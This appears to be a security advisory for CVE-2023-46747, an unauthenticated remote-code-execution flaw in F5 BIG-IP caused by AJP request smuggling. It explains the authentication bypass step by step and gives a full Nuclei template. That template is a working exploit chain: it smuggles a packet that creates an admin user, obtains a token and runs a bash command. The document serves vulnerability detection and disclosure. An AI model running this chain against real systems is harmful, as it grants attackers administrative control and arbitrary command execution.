F5 BIG-IP Unauth RCE via AJP Smuggling (CVE-2023-46747)

Description:

CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility identified as a request smuggling bug within the Apache JServ Protocol (AJP). The flaw could potentially allow unauthenticated attackers with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands. This vulnerability was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security. It has a CVSS score of 9.8: critical severity.

Technical Details:

The attack primarily exploits the HTTP to AJP request smuggling due to inconsistencies in handling Content-Length/Transfer-Encoding headers between Apache HTTPd and AJP Processing in Tomcat. Here's a breakdown:

1. Origin of the Discrepancy: Apache HTTPd receives an HTTP request with a Transfer-Encoding: chunked, chunked header, which it then sends to Tomcat via AJP. Tomcat, expecting Transfer-Encoding to be just chunked, doesn't find a match. It then looks for a Content-length header, which isn't there, so it defaults to assuming a Content-length of 0.

2. Resulting Desynchronization: This misunderstanding means the AJP Data packet (essentially the POST Body of the HTTP request) is misinterpreted as a separate AJP Forward Request packet.

3. Exploiting the Gap: Attackers, by crafting the POST body to precisely 516 bytes (0x204 bytes), can evade the initial authentication checks and access specific /tmui/ endpoints directed to the AJP port.

4. Bypassing Further Checks: There are additional authentication steps on many /tmui/* pages. Overcoming these requires:
- Setting the REMOTE_USER attribute which can be done at the AJP level.
- Providing a REMOTEROLE request header with any valid integer role id, ensuring successful authentication bypass.

5. Gaining Full Access: The goal is to find requests under 516 bytes that grant admin user access or allow remote code execution. One such request was discovered that creates an admin user through the BIG-IP UI, specifically targeting the /tmui/Control/form endpoint. Though initially oversized, the request was slimmed down by removing redundant parameters to fit within the 516-byte limit.

6. Overcoming Final Hurdles: A CSRF check exist in the user creation action that ensures if the _bufvalue parameter matches the base64 SHA1 digest of the Tmui-Dubbuf header and the _timenow parameter concatenated together. Given the full control of the request we could calculate these values ahead of time. Also, to meet the requirement of exact 0x204 bytes of packet size, padding with extra "B"s in the Tmui-Dubbuf header was added.

7. Endgame: TL;DR: attackers can establish an admin user without prior authentication. Once this is done, they can use built-in F5 functionalities to run Bash commands, allowing them to execute code.

Nuclei Template

The ProjectDiscovery research team compiled a template so that all nuclei users can detect exploitable vulnerabilities to CVE-2023-46747 in their attack surface. This was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the details of the vulnerability.

id: CVE-2023-46747

info:
  name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
  reference:
    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
    - https://my.f5.com/manage/s/article/K000137353
  tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive

variables:
  username: "{{hex_encode(rand_base(5))}}"
  password: "{{hex_encode(rand_base(12))}}"
  password2: "{{rand_base(14)}}"

http:
  - raw:
      - |+
        POST /tmui/login.jsp HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chunked, chunked
        Content-Type: application/x-www-form-urlencoded

        204
        {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
        0

    unsafe: true

  - raw:
      - |+
        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
        Content-Type: application/json

        {"password": "{{password2}}"}

      - |+
        POST /mgmt/shared/authn/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{hex_decode(username)}}", "password":"{{pass}}"}

      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{token}}
        Content-Type: application/json

        {"command":"run","utilCmdArgs":"-c id"}

    payloads:
      pass:
        - '{{password2}}'
        - '{{hex_decode(password)}}'
    skip-variables-check: true
    stop-at-first-match: true

    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - "([A-Z0-9]{26})"
        internal: true

      - type: regex
        part: body_3
        group: 1
        regex:
          - "\"commandResult\":\"(.*)\""

      - type: dsl
        dsl:
          - '"Username:" + hex_decode(username)'
          - '"Password:" + pass'
          - '"Token:" + token'
    matchers:
      - type: word
        words:
          - "commandResult"
          - "uid="
        condition: and

Timeline:

October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian

Remediation:

Patching is the strongly recommended course of action to remediate this vulnerability. F5 has provided mitigation guidance alongside patching, especially if patching cannot be performed immediately. It is advisable to review the F5 article here for recommended mitigation steps and warnings. Additionally, F5 has cautioned that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.